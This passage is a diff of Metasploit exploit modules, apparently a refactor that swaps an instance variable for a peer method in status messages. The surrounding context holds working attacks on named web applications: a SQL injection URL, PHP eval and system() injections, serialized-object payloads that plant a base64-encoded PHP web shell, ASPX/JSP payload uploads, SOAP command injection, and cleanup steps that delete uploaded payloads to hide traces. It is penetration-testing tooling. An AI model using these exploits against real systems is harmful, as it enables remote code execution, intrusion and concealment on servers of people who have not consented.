+      print_status("#{peer} - Retrieving real file name from the database.")
       sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
       begin
         res = send_request_cgi({
@@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
         })
         if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
           @token = $1
-          print_good("#{@peer} - Successfully retrieved file name (#{@token})")
+          print_good("#{peer} - Successfully retrieved file name (#{@token})")
         else
-          print_error("#{@peer} - Could not retrieve file name from the database.")
+          print_error("#{peer} - Could not retrieve file name from the database.")
           return
         end
       rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        print_error("#{@peer} - Connection failed")
+        print_error("#{peer} - Connection failed")
         return
       end
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (#{@token}.php)")
+    print_status("#{peer} - Executing payload (#{@token}.php)")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 

--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if res and res.headers['Set-Cookie']
       cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
     else
-      fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+      fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
     end
 
     cookie
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
         login[name] = value
       end
     else
-      fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
+      fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
     end
 
     # Add the rest of fields required for login
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
       cookie_cred = "#{cookie}; #{user}; #{pass}"
     else
       cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
-      fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
+      fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
     end
 
     return cookie_cred
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
         fields[n] = v
       end
     else
-      fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
+      fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
     end
 
     # Generate enough URLs to trigger spam logging
@@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     @base = normalize_uri(target_uri.path)
     @base << '/' if @base[-1, 1] != '/'
 
-    print_status("#{@peer} - Getting cookie")
+    print_status("#{peer} - Getting cookie")
     cookie = get_cookie
 
-    print_status("#{@peer} - Logging in")
+    print_status("#{peer} - Logging in")
     cred = login(cookie)
 
-    print_status("#{@peer} - Triggering spam logging")
+    print_status("#{peer} - Triggering spam logging")
     inject_exec(cred)
 
     handler

--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
+    print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
     res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
   end
 end

--- a/modules/exploits/unix/webapp/hastymail_exec.rb
+++ b/modules/exploits/unix/webapp/hastymail_exec.rb
@@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
     @session_id = ""
-    @peer = "#{rhost}:#{rport}"
 
     login
 
     if not @session_id or @session_id.empty?
-      print_error "#{@peer} - Authentication failed"
+      print_error "#{peer} - Authentication failed"
       return Exploit::CheckCode::Unknown
     end
 
@@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 303
       @session_id = res["Set-Cookie"]
-      print_good "#{@peer} - Authentication successful"
+      print_good "#{peer} - Authentication successful"
     end
   end
 
@@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
     @session_id = ""
-    @peer = "#{rhost}:#{rport}"
 
-    print_status "#{@peer} - Trying login"
+    print_status "#{peer} - Trying login"
     login
 
     if not @session_id or @session_id.empty?
-      print_error "#{@peer} - Authentication failed"
+      print_error "#{peer} - Authentication failed"
       return
     end
 
-    print_status "#{@peer} - Authentication successfully, trying to exploit"
+    print_status "#{peer} - Authentication successfully, trying to exploit"
 
     data = "rs=passthru&"
     data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200 or not res.body =~ /\+/
-      print_error "#{@peer} - Exploitation failed"
+      print_error "#{peer} - Exploitation failed"
       return
     end
 

--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def cookie_prefix
-    print_status("#{@peer} - Checking for cookie prefix")
+    print_status("#{peer} - Checking for cookie prefix")
     cookie_prefix = ""
     res = send_request_cgi(
       {
@@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
-      print_status("#{@peer} - Cookie prefix #{$1} found")
+      print_status("#{peer} - Cookie prefix #{$1} found")
       cookie_prefix = $1
     end
     return cookie_prefix
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
     res = send_request_cgi(
       {
@@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
     if client.type == "meterpreter"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{@upload_php}")
+        print_warning("#{peer} - Deleting #{@upload_php}")
         client.fs.file.rm(@upload_php)
-        print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+        print_good("#{peer} - #{@upload_php} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
 
   def exploit
     @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
-    @peer = "#{rhost}:#{rport}"
 
     # get_write_exec_payload uses a function, which limits our ability to support
     # Linux payloads, because that requires a space:
@@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
 
-    print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
 
     res = send_request_cgi(
     {
@@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}")
+      print_error("#{peer} - Exploit failed: #{res.code}")
       return
     end
 
-    print_status("#{@peer} - Executing the payload #{@upload_php}")
+    print_status("#{peer} - Executing the payload #{@upload_php}")
 
     res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 

--- a/modules/exploits/unix/webapp/php_charts_exec.rb
+++ b/modules/exploits/unix/webapp/php_charts_exec.rb
@@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = target_uri.path
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     code  = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
     rand_key_value = rand_text_alphanumeric(rand(10)+6)
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{code.length} bytes)")
+    print_status("#{peer} - Sending payload (#{code.length} bytes)")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
       })
       if res and res.code == 500
-        print_good("#{@peer} - Payload sent successfully")
+        print_good("#{peer} - Payload sent successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+        fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end

--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
 
     if res and res.code == 404
-      print_error("#{@peer} - The upload most likely failed")
+      print_error("#{peer} - The upload most likely failed")
       return
     end
 
@@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
@@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     p = get_write_exec_payload(:unlink_self=>true)
 
-    print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
     res = upload_php(base, php_fname, p, folder_name)
 
     if not res
-      print_error("#{@peer} - No response from server")
+      print_error("#{peer} - No response from server")
       return
     end
 
-    print_status("#{@peer} - Executing '#{php_fname}'...")
+    print_status("#{peer} - Executing '#{php_fname}'...")
     exec_php(base, res)
   end
 end

--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
       f = "pathCache.php"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{f}")
+        print_warning("#{peer} - Deleting #{f}")
         client.fs.file.rm(f)
-        print_good("#{@peer} - #{f} removed to stay ninja")
+        print_good("#{peer} - #{f} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
@@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     base = normalize_uri(target_uri.path)
 
-    @peer = "#{rhost}:#{rport}"
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
@@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
       return
     end
 
     if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
       session_id = $1
     else
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
       return
     end
 
-    print_status("#{@peer} - Login successful with #{username}:#{password}")
+    print_status("#{peer} - Login successful with #{username}:#{password}")
 
     data = "module=Contacts&"
     data << "Contacts2_CONTACT_offset=1&"
@@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
     data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
 
-    print_status("#{@peer} - Exploiting the unserialize()")
+    print_status("#{peer} - Exploiting the unserialize()")
 
     res = send_request_cgi(
     {
@@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}")
+      print_error("#{peer} - Exploit failed: #{res.code}")
       return
     end
 
-    print_status("#{@peer} - Executing the payload")
+    print_status("#{peer} - Executing the payload")
 
     res = send_request_cgi(
     {
@@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 

--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
     if client.type == "meterpreter"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{@upload_php}")
+        print_warning("#{peer} - Deleting #{@upload_php}")
         client.fs.file.rm(@upload_php)
-        print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+        print_good("#{peer} - #{@upload_php} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
@@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
     base = target_uri.path
     base << '/' if base[-1, 1] != '/'
     @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
-    @peer = "#{rhost}:#{rport}"
 
-    print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
+    print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
 
     res = send_request_cgi(
       'uri' => normalize_uri(base, "tiki-rss_error.php")
@@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     else
       tiki_path = $1
-      print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
+      print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
     end
 
     php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
     printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
     printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
 
-    print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
 
     res = send_request_cgi(
     {
@@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
+      print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
       return
     end
 
-    print_status("#{@peer} - Executing the payload #{@upload_php}")
+    print_status("#{peer} - Executing the payload #{@upload_php}")
 
     res = send_request_cgi(
     {
@@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 

--- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
@@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
-    @peer    = "#{rhost}:#{rport}"
     base     = target_uri.path
     base    << '/' if base[-1, 1] != '/'
     cookie   = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
     command  = Rex::Text.uri_encode(payload.encoded)
 
     # login
-    print_status("#{@peer} - Authenticating as user '#{user}'")
+    print_status("#{peer} - Authenticating as user '#{user}'")
     begin
       res = send_request_cgi({
         'method' => 'POST',
@@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => "#{data}",
       })
       if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
-        fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+        fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
-    print_good("#{@peer} - Authenticated successfully")
+    print_good("#{peer} - Authenticated successfully")
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{command.length} bytes)")
+    print_status("#{peer} - Sending payload (#{command.length} bytes)")
     begin
       res = send_request_cgi({
         'method'    => 'POST',
@@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie'    => "#{cookie}"
       })
       if res and res.code == 200
-        print_good("#{@peer} - Payload sent successfully")
+        print_good("#{peer} - Payload sent successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end

--- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
+++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
@@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
     cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
 
     begin
-      print_warning("#{@peer} - Removing #{@payload_path}")
+      print_warning("#{peer} - Removing #{@payload_path}")
       cli.fs.file.rm(@payload_path)
-      print_good("#{@peer} - #{@payload_path} deleted")
+      print_good("#{peer} - #{@payload_path} deleted")
     rescue ::Exception => e
       print_error("Unable to delete #{@payload_path}: #{e.message}")
     end
@@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
-
     # Generate the ASPX containing the EXE containing the payload
     exe = generate_payload_exe
     aspx = Msf::Util::EXE.to_exe_aspx(exe)
@@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # UPLOAD
     #
     attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
-    print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_url = ""
     @payload_path = ""
     if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
-      print_good("#{@peer} - Payload uploaded successfuly")
+      print_good("#{peer} - Payload uploaded successfuly")
     else
-      print_error("#{@peer} - Payload upload failed")
+      print_error("#{peer} - Payload upload failed")
       return
     end
 
@@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
       @payload_path = $1
-      print_status("#{@peer} - Payload stored on #{@payload_path}")
+      print_status("#{peer} - Payload stored on #{@payload_path}")
     else
-      print_error("#{@peer} - The payload file path couldn't be retrieved")
+      print_error("#{peer} - The payload file path couldn't be retrieved")
     end
 
     if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
       payload_url = URI($1).path
     else
-      print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!")
+      print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
       return
     end
 
@@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # EXECUTE
     #
-    print_status("#{@peer} - Executing #{payload_url}...")
+    print_status("#{peer} - Executing #{payload_url}...")
 
     res = send_request_cgi({
       'uri'          =>  payload_url,
@@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (!res or (res and res.code != 200))
-      print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
+      print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
       return
     end
 

--- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb
+++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb
@@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     # New lines are handled on the vuln app and payload is corrupted
     jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
     jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
     data = post_data.to_s
     data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
-    print_status("#{@peer} - Uploading the JSP payload...")
+    print_status("#{peer} - Uploading the JSP payload...")
     res = send_request_cgi({
       'uri'    => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
       'method' => 'POST',
@@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res and res.code == 200 and res.body.empty?
-      print_status("#{@peer} - JSP payload uploaded successfully")
+      print_status("#{peer} - JSP payload uploaded successfully")
       register_files_for_cleanup(jsp_name)
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
     end
 
-    print_status("#{@peer} - Executing payload...")
+    print_status("#{peer} - Executing payload...")
     send_request_cgi({
       'uri'    => normalize_uri(jsp_name),
       'method' => 'GET'

--- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
+++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
@@ -82,9 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Delivering payload...")
+    print_status("#{peer} - Delivering payload...")
 
     # The path to the injection is something like:
     # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens)
@@ -133,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_soap_request("OPCACTIVATE", "omHost", command)
 
     if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/
-      fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, aborting...")
     end
 
   end

--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -346,9 +346,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     soap = <<-eos
 <?xml version="1.0" encoding="utf-8"?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
@@ -384,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Testing command injection...")
+    print_status("#{peer} - Testing command injection...")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -421,9 +418,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
 
-
-    @peer = "#{rhost}:#{rport}"
-
     soap = <<-eos
 <?xml version="1.0" encoding="utf-8"?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
@@ -459,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Injecting system commands...")
+    print_status("#{peer} - Injecting system commands...")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -472,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 10)
 
     if (res and res.code == 500 and res.body =~ /Generic error/)
-      print_good("#{@peer} - System command successfully injected")
+      print_good("#{peer} - System command successfully injected")
     else
-      print_error("#{@peer} - Failed to inject system command")
+      print_error("#{peer} - Failed to inject system command")
       return
     end
 
@@ -511,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Executing injected command")
+    print_status("#{peer} - Executing injected command")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -524,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 1)
 
     if res
-      print_error("#{@peer} - Failed to execute injected command")
+      print_error("#{peer} - Failed to execute injected command")
       return
     end
 

--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       aspx = @upload_random + '.aspx'
 
-      print_status("#{@peer} - Searching: #{aspx}")
+      print_status("#{peer} - Searching: #{aspx}")
       files = cli.fs.file.search("\\", aspx)
       if not files or files.empty?
         print_error("Unable to find #{aspx}. Please manually remove it.")
@@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
       files.each { |f|
-        print_warning("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}")
+        print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}")
         cli.fs.file.rm(f['path'] + "\\" + f['name'])
       }
-      print_good("#{@peer} - #{aspx} deleted")
+      print_good("#{peer} - #{aspx} deleted")
     rescue ::Exception => e
       print_error("Unable to delete #{aspx}: #{e.message}")
     end
@@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # Module based heavily upon Juan Vazquez's 'landesk_thinkmanagement_upload_asp.rb'
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
-
     # Generate the ASPX containing the EXE containing the payload
     exe = generate_payload_exe
     aspx = Msf::Util::EXE.to_exe_aspx(exe)
@@ -124,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote
     #
 
     attack_url = uri_path + "webservices/codeEditorSave.asmx"
-    print_status("#{@peer} - Uploading #{aspx.length} bytes through #{attack_url}...")
-    print_status("#{@peer} - Uploading to #{uri_path}#{@upload_random}.aspx")
+    print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -138,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_status("#{@peer} - Timeout: Trying to execute the payload anyway")
+      print_status("#{peer} - Timeout: Trying to execute the payload anyway")
     elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
-      print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
     else
-      print_status("#{@peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway")
+      print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway")
     end
 
     #
@@ -150,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
 
     upload_path = uri_path + "#{@upload_random}.aspx"
-    print_status("#{@peer} - Executing #{upload_path}...")
+    print_status("#{peer} - Executing #{upload_path}...")
 
     res = send_request_cgi({
       'uri'          =>  upload_path,
@@ -158,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_error("#{@peer} - Execution failed on #{upload_path} [No Response]")
+      print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
       return
     end
 
     if (res.code < 200 or res.code > 302)
-      print_error("#{@peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+      print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
       return
     end
 
@@ -186,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote
     eos
 
     attack_url = uri_path + "webservices/codeEditorSave.asmx"
